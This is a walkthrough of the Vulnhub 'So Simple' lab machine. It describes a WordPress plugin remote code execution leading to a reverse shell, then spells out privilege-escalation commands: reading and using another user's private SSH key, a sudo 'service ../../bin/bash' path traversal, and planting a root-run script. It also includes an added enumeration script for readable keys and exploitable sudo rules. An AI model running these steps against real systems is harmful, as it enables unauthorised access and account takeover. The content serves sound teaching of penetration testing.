Introduction

In this video walkthrough, we demonstrated how a vulnerable WordPress plugin can lead to a complete system compromise. We then escalated our privileges by taking advantage of misconfigured sudo permissions. We used the So Simple box from Vulnhub for this walkthrough.

Finding the Vulnerability

First, I scanned the target machine's WordPress installation. The scan flagged two outdated plugins: Social Warfare and Simple Card Solution. I decided to focus on Social Warfare because a quick search revealed a critical remote code execution exploit for a version very close to the one on the target. A close version match is not a guarantee, so it is worth confirming that the installed version actually falls inside the exploit's affected range before spending time on a payload.

Gaining Initial Access

With the exploit in hand, I created a payload file designed to read /etc/passwd and served it from my machine. I then triggered it by visiting a specially crafted URL that makes the vulnerable plugin fetch my file and execute its contents. Success! The contents of /etc/passwd were displayed in my browser, which confirmed code execution on the target rather than just a file read.

Next, I modified the payload to establish a reverse shell connection back to my machine. I started a Netcat listener on my end and, by revisiting the crafted URL, got a limited shell on the target machine.

Escalating Privileges

Now for the fun part: escalating my privileges.

  1. From Limited Shell to User “Max”: My initial shell was pretty restricted. I navigated to /home and found two users, “max” and “steven”. After some digging in max's home directory, I found his .ssh directory and, within it, his private key (id_rsa), readable by my low-privileged user. Using this key, I was able to SSH into the machine as max, which gave me a much more stable and flexible shell than the reverse shell.
  2. From User “Max” to User “Steven”: As max, I checked what I could run with sudo (sudo -l). It turned out I could run the service command as steven. The service wrapper runs its argument relative to the init script directory, so passing ../../bin/bash as the “service name” makes it execute /bin/bash, and that spawned a shell as steven.
  3. From User “Steven” to Root: One final privilege escalation was needed. As steven, I again checked my sudo permissions and found that I could run a script under /opt/tools as root without a password. Neither the script nor its directory existed, but /opt was writable, so I created the directory and the script myself, gave it execute permissions, and ran it with sudo. A sudo rule that points at a path the low-privileged user can create is as good as a rule for /bin/bash. And just like that, I had full root access to the machine! 👑
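The two enumeration checks behind this chain, scripted: readable SSH material in other users' home directories (the max step) and sudo rules whose target does not exist but can be planted by the current user (the steven-to-root step). This is an added example, not code from the original walkthrough or from the box's author. It assumes rule lines shaped like "(runas) [TAG:] /path [args]", as sudo -l prints them, and takes an optional FSROOT prefix so the checks can be exercised against a fake directory tree; the sudo -l text embedded in the demo is constructed, not captured from the box.

```shell
#!/bin/sh
# Added example, not code from the original walkthrough or the box author.
# Two enumeration checks behind the escalation chain above:
#   find_readable_keys - .ssh material under /home that the current user can read
#                        (the "max" step: a readable id_rsa is an SSH login as that user)
#   audit_sudo_output  - classify every command in `sudo -l` output: does the target
#                        exist, and if not, can we create it? (the "steven" -> root
#                        step: a NOPASSWD rule for a script that does not exist yet)
# Assumptions: rule lines look like "(runas) [TAG:] /path [args]" as sudo -l prints
# them; FSROOT is an optional prefix so the checks can run against a fake tree.

# find_readable_keys [FSROOT]
find_readable_keys() {
    local fsroot="${1:-}" f
    find "${fsroot}/home" -path '*/.ssh/*' -type f 2>/dev/null |
    while IFS= read -r f; do
        if [ -r "$f" ]; then printf '%s\n' "$f"; fi
    done
    return 0
}

# classify_target PATH [FSROOT]
# Prints EXISTS, EXISTS_WRITABLE, MISSING_CREATABLE (the nearest existing ancestor
# directory is writable, so the missing command can be planted) or MISSING.
classify_target() {
    local target="$1" fsroot="${2:-}" dir
    if [ -e "${fsroot}${target}" ]; then
        if [ -w "${fsroot}${target}" ]; then echo "EXISTS_WRITABLE"; else echo "EXISTS"; fi
        return 0
    fi
    dir="$(dirname "$target")"
    while [ "$dir" != "/" ] && [ ! -e "${fsroot}${dir}" ]; do
        dir="$(dirname "$dir")"
    done
    if [ -w "${fsroot}${dir}" ]; then echo "MISSING_CREATABLE"; else echo "MISSING"; fi
}

# audit_sudo_output FILE [FSROOT]
# FILE holds the text of `sudo -l`. Prints one line per command:
#   runas=<user> cmd=<executable> status=<classification>
audit_sudo_output() {
    local file="$1" fsroot="${2:-}" line runas rest cmd exe status
    while IFS= read -r line; do
        case "$line" in
            *'('*')'*) ;;       # rule lines carry a "(runas)" field; headers do not
            *) continue ;;
        esac
        runas="${line#*"("}"; runas="${runas%%")"*}"
        rest="${line#*")"}"
        # Strip leading whitespace and any sudoers tags (NOPASSWD:, SETENV:, ...).
        rest="$(printf '%s' "$rest" | sed -E -e 's/^[[:space:]]+//' -e ':a' \
            -e 's/^(NOPASSWD|PASSWD|SETENV|NOSETENV|NOEXEC|EXEC):[[:space:]]*//' -e 'ta')"
        # One rule may list several commands separated by commas.
        printf '%s\n' "$rest" | tr ',' '\n' | while IFS= read -r cmd; do
            cmd="$(printf '%s' "$cmd" | sed -E 's/^[[:space:]]+//; s/[[:space:]]+$//')"
            [ -n "$cmd" ] || continue
            exe="${cmd%% *}"    # first word is the executable; anything after it is pinned args
            if [ "$exe" = "ALL" ]; then status="ALL"
            else status="$(classify_target "$exe" "$fsroot")"; fi
            printf 'runas=%s cmd=%s status=%s\n' "$runas" "$exe" "$status"
        done
    done < "$file"
}

# Demo: a constructed listing shaped like the two rules from the walkthrough (not
# the box's real output), checked against the live filesystem of wherever this runs.
demo() {
    local sample; sample="$(mktemp)"
    cat > "$sample" <<'EOF'
User steven may run the following commands on so-simple:
    (root) NOPASSWD: /opt/tools/server-health.sh
    (steven) NOPASSWD: /usr/sbin/service
EOF
    audit_sudo_output "$sample"
    rm -f "$sample"
}
demo
```

On a real target, run sudo -l > /tmp/sudo-l.txt and then audit_sudo_output /tmp/sudo-l.txt: a status of MISSING_CREATABLE on a rule that runs as root is exactly the situation exploited in step 3, and EXISTS_WRITABLE on a script is the same bug one step earlier.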

Technical Commands Used

Here are the commands I used in the terminal throughout this process:

  • ls
  • cd home
  • cd max
  • cat user
  • ls -la
  • cd .ssh
  • cat id_rsa
  • ssh -i id_rsa max@192.168.1.56 (copy the key to the attacking machine and chmod 600 it first; ssh refuses to use a private key whose permissions are too open)
  • sudo -l
  • sudo -u steven /sbin/service ../../bin/bash (the service wrapper prefixes its argument with the init script directory, so this resolves to /bin/bash and spawns a shell as steven)
  • cd /opt
  • mkdir tools
  • cd tools
  • nano server-health.sh
  • chmod +x server-health.sh
  • sudo -u root /opt/tools/server-health.sh (the script did not exist until I wrote it, so whatever it contains runs as root)

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, a cybersecurity content creator and YouTuber.
